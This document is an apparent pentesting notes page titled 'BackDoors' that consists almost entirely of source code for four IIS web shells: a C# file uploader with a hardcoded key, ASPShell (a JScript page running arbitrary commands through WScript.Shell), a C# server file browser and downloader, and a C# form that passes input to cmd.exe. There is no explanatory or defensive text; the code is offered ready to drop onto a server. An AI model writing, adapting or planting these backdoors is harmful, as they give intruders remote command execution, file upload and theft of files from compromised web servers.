BackDoors
Last updated
Was this helpful?
Last updated
Was this helpful?
<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
if (Request.Params["authkey"] == null)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
if (Request.Params["authkey"] != AUTHKEY)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "upload")
{
Response.Write(HEADER);
Response.Write(this.UploadFile());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
///
/// </summary>
private string UploadFile()
{
try
{
if (Request.Params["authkey"] == null)
{
return string.Empty;
}
if (Request.Params["authkey"] != AUTHKEY)
{
return string.Empty;
}
if (Request.Files.Count != 1)
{
return "No file selected";
}
HttpPostedFile httpPostedFile = Request.Files[0];
int fileLength = httpPostedFile.ContentLength;
byte[] buffer = new byte[fileLength];
httpPostedFile.InputStream.Read(buffer, 0, fileLength);
FileInfo fileInfo = new FileInfo(Request.PhysicalPath);
using (FileStream fileStream = new FileStream(Path.Combine(fileInfo.DirectoryName, Path.GetFileName(httpPostedFile.FileName)), FileMode.Create))
{
fileStream.Write(buffer, 0, buffer.Length);
}
return "File uploaded";
}
catch (Exception ex)
{
return ex.ToString();
}
}
/// <summary>
///
/// </summary>
/// <returns></returns>
private string GetUploadControls()
{
string temp = string.Empty;
temp = "<form enctype=\"multipart/form-data\" action=\"?operation=upload\" method=\"post\">";
temp += "<br>Auth Key: <input type=\"text\" name=\"authKey\"><br>";
temp += "<br>Please specify a file: <input type=\"file\" name=\"file\"></br>";
temp += "<div><input type=\"submit\" value=\"Send\"></div>";
temp += "</form>";
return temp;
}
</script>
<!-- Created by Mark Woan (http://www.woanware.co.uk) --><%@ Language = "JScript" %>
<%
/*
ASPShell - web based shell for Microsoft IIS
Copyright (C) 2007 Kurt Hanner
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
http://aspshell.sourceforge.net
*/
var version = "0.2 (beta) [2007-09-29]";
var homepagelink = "http://aspshell.sourceforge.net";
var q = Request("q")();
var cd = Request("cd")();
if (q)
{
var command = "";
var output = "";
if (q.length == 0)
{
q = ":";
}
command = "" + q;
if (command == "?")
{
output = " ? this help page\n" +
" :sv all server variables\n" +
" <shell command> execute any shell command\n";
}
else if (command.toLowerCase() == ":sv")
{
var sv = "";
var svvalue = "";
var esv = new Enumerator(Request.ServerVariables);
for (; !esv.atEnd(); esv.moveNext())
{
sv = esv.item();
output += sv;
output += ": ";
svvalue = "" + Request.ServerVariables(sv);
if (svvalue.indexOf("\n") >= 0)
{
output += "\n";
var svitems = svvalue.split("\n");
for (var i=0; i<svitems.length; i++)
{
if (svitems[i].length > 0)
{
output += " ";
output += svitems[i];
output += "\n";
}
}
}
else
{
output += svvalue;
output += "\n";
}
}
}
else if (command.toLowerCase() == ":cd")
{
var fso = new ActiveXObject("Scripting.FileSystemObject");
output = fso.GetAbsolutePathName(".");
}
else if (/^:checkdir\s(.*)?$/i.test(command))
{
var newdirabs = "";
var newdir = RegExp.$1;
var fso = new ActiveXObject("Scripting.FileSystemObject");
var cdnorm = fso.GetFolder(cd).Path;
if (/^\\/i.test(newdir))
{
newdirabs = fso.GetFolder(cd).Drive + newdir;
}
else if (/^\w:/i.test(newdir))
{
newdirabs = fso.GetAbsolutePathName(newdir);
}
else
{
newdirabs = fso.GetAbsolutePathName(fso.GetFolder(cd).Path + "\\" + newdir);
}
output = fso.FolderExists(newdirabs) ? newdirabs : "fail";
}
else
{
var changedir = "";
var currdrive = "";
var currpath = "";
var colonpos = cd.indexOf(":");
if (colonpos >= 0) {
currdrive = cd.substr(0, colonpos+1);
currpath = cd.substr(colonpos+1);
changedir = currdrive + " && cd \"" + currpath + "\" && ";
}
var shell = new ActiveXObject("WScript.Shell");
var pipe = shell.Exec("%comspec% /c \"" + changedir + command + "\"");
output = pipe.StdOut.ReadAll() + pipe.StdErr.ReadAll();
}
Response.Write(output);
}
else
{
var fso = new ActiveXObject("Scripting.FileSystemObject");
var currentpath = fso.GetAbsolutePathName(".");
var currentdrive = fso.GetDrive(fso.GetDriveName(currentpath));
var drivepath = currentdrive.Path;
%>
<html>
<head>
<meta HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<style><!--
body {
background: #000000;
color: #CCCCCC;
font-family: courier new;
font-size: 10pt
}
input {
background: #000000;
color: #CCCCCC;
border: none;
font-family: courier new;
font-size: 10pt;
}
--></style>
<script language="JavaScript"><!--
var history = new Array();
var historypos = 0;
var currentdirectory = "";
var checkdirectory = "";
function ajax(url, vars, callbackFunction)
{
var request = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("MSXML2.XMLHTTP.3.0");
request.open("POST", url, true);
request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
request.onreadystatechange = function()
{
if (request.readyState == 4 && request.status == 200)
{
if (request.responseText)
{
callbackFunction(request.responseText);
}
}
}
request.send(vars);
}
function FormatOutput(txt)
{
return txt.replace(/</g, "<").replace(/>/g, ">").replace(/\x20/g, " ").replace(/\t/g, " ").replace(/\n/g, "<br/>");
}
function KeyDownEventHandler(ev)
{
document.all("q").focus();
if (!ev)
{
ev = window.event;
}
if (ev.which)
{
keycode = ev.which;
}
else if (ev.keyCode)
{
keycode = ev.keyCode;
}
if (keycode == 13)
{
var cmd = document.all("q").value;
outputAvailable("[" + currentdirectory + "] " + cmd);
if (/cd\s+(\"?)(.*)?\1\s*$/i.test(cmd))
{
checkdirectory = RegExp.$2;
ajax(document.URL, "q=" + encodeURIComponent(":checkdir " + RegExp.$2) + "&cd=" + encodeURIComponent(currentdirectory), checkdirAvailable);
history[history.length] = cmd;
historypos = history.length;
}
else if (cmd.length > 0)
{
ajax(document.URL, "q=" + encodeURIComponent(cmd) + "&cd=" + encodeURIComponent(currentdirectory), outputAvailable);
history[history.length] = cmd;
historypos = history.length;
}
}
else if (keycode == 38 && historypos > 0)
{
historypos--;
document.all("q").value = history[historypos];
}
else if (keycode == 40 && historypos < history.length)
{
historypos++;
if (historypos == history.length)
{
document.all("q").value = "";
}
else {
document.all("q").value = history[historypos];
}
}
}
function outputAvailable(output)
{
var newelem = document.createElement("DIV");
newelem.innerHTML = FormatOutput(output);
document.all("output").appendChild(newelem);
var oldYPos = 0, newYPos = 0;
var scroll = true;
do
{
if (document.all)
{
oldYPos = document.body.scrollTop;
}
else
{
oldYPos = window.pageYOffset;
}
window.scrollBy(0, 100);
if (document.all)
{
newYPos = document.body.scrollTop;
}
else
{
newYPos = window.pageYOffset;
}
} while (oldYPos < newYPos);
document.all("q").value = "";
}
function checkdirAvailable(output)
{
if (output.toLowerCase() == "fail")
{
outputAvailable("The system cannot find the path specified.");
}
else {
SetCurrentDirectory(output);
}
}
function SetCurrentDirectory(output)
{
currentdirectory = output;
document.all("prompt").innerHTML = "[" + output + "]";
}
function GetCurrentDirectory()
{
ajax(document.URL, "q=" + encodeURIComponent(":cd"), SetCurrentDirectory);
}
function InitPage()
{
document.all("q").focus();
document.onkeydown = KeyDownEventHandler;
GetCurrentDirectory();
}
//--></script>
<title id=titletext>Web Shell</title>
</head>
<body onload="InitPage()">
<div id="output">
<div id="greeting">
ASPShell - Web-based Shell Environment Version <%=version%><br/>
Copyright (c) 2007 Kurt Hanner, <a href="<%=homepagelink%>"><%=homepagelink%></a><br/><br/>
</div>
</div>
<label id="prompt">[undefined]</label>
<input type="text" name="q" maxlength=1024 size=72>
</body>
</html>
<%
}
%><%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Text" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script language="c#" runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
if (Request.Params["authkey"] == null)
{
return;
}
if (Request.Params["authkey"] != AUTHKEY)
{
return;
}
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "download")
{
Response.Write(HEADER);
Response.Write(this.DownloadFile());
Response.Write(FOOTER);
}
else if (Request.Params["operation"] == "list")
{
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
///
/// </summary>
private string DownloadFile()
{
try
{
if (Request.Params["file"] == null)
{
return "No file supplied";
}
string file = Request.Params["file"];
if (File.Exists(file) == false)
{
return "File does not exist";
}
Response.ClearContent();
Response.ClearHeaders();
Response.Clear();
Response.ContentType = "application/octet-stream";
Response.AddHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(file));
Response.AddHeader("Content-Length", new FileInfo(file).Length.ToString());
Response.WriteFile(file);
Response.Flush();
Response.Close();
return "File downloaded";
}
catch (Exception ex)
{
return ex.ToString();
}
}
/// <summary>
///
/// </summary>
private string OutputList()
{
try
{
StringBuilder response = new StringBuilder();
string dir = string.Empty;
if (Request.Params["directory"] == null)
{
string[] tempDrives = Environment.GetLogicalDrives();
if (tempDrives.Length > 0)
{
for (int index = 0; index < tempDrives.Length; index++)
{
try
{
dir = tempDrives[index];
break;
}
catch (IOException){}
}
}
}
else
{
dir = Request.Params["directory"];
}
if (Directory.Exists(dir) == false)
{
return "Directory does not exist";
}
// Output the auth key textbox
response.Append("<table><tr>");
response.Append(@"<td><asp:TextBox id=""txtAuthKey"" runat=""server""></asp:TextBox></td>");
response.Append("</tr><tr><td> <td></tr></table>");
// Output the available drives
response.Append("<table><tr>");
response.Append("<td>Drives</td>");
string[] drives = Environment.GetLogicalDrives();
foreach (string drive in drives)
{
response.Append("<td><a href=");
response.Append("?directory=");
response.Append(drive);
response.Append("&authkey=" + Request.Params["authkey"]);
response.Append("&operation=list>");
response.Append(drive);
response.Append("</a></td>");
}
// Output the current path
response.Append("</tr></table><table><tr><td> </td></tr>");
response.Append("<tr><td>.. <a href=\"?directory=");
string parent = dir;
DirectoryInfo parentDirInfo = Directory.GetParent(dir);
if (parentDirInfo != null)
{
parent = parentDirInfo.FullName;
}
response.Append(parent);
response.Append("&authkey=" + Request.Params["authkey"]);
response.Append("&operation=list\">");
response.Append(parent);
response.Append("</a></td></tr></table><table>");
// Output the directories
System.IO.DirectoryInfo dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.DirectoryInfo dirs in dirInfo.GetDirectories("*.*"))
{
response.Append("<tr><td>dir <a href=\"?directory=" + dirs.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=list\">" + dirs.FullName + "</a></td></tr>");
}
// Output the files
dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.FileInfo fileInfo in dirInfo.GetFiles("*.*"))
{
response.Append("<tr><td>file <a href=\"?file=" + fileInfo.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=download\">" + fileInfo.FullName + "</a></td><td>");
response.Append(fileInfo.Length);
response.Append("</td></tr>");
}
response.Append("</table>");
return response.ToString();
}
catch (Exception ex)
{
return ex.ToString();
}
}
</script>
<!-- Created by Mark Woan (http://www.woanware.co.uk) --><%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>command</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
Response.Write(HEADER);
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(this.ExecuteCommand(txtCommand.Text)));
Response.Write("</pre>");
Response.Write(FOOTER);
}
/// <summary>
///
/// </summary>
/// <param name="command"></param>
/// <returns></returns>
private string ExecuteCommand(string command)
{
try
{
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = "cmd.exe";
processStartInfo.Arguments = "/c " + command;
processStartInfo.RedirectStandardOutput = true;
processStartInfo.UseShellExecute = false;
Process process = Process.Start(processStartInfo);
using (StreamReader streamReader = process.StandardOutput)
{
string ret = streamReader.ReadToEnd();
return ret;
}
}
catch (Exception ex)
{
return ex.ToString();
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
<title>Command</title>
</head>
<body>
<form id="formCommand" runat="server">
<div>
<table>
<tr>
<td width="30">Auth Key:</td>
<td><asp:TextBox id="txtAuthKey" runat="server"></asp:TextBox></td>
</tr>
<tr>
<td width="30">Command:</td>
<td><asp:TextBox ID="txtCommand" runat="server" Width="820px"></asp:TextBox></td>
</tr>
<td> </td>
<td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td>
</tr>
</table>
</div>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->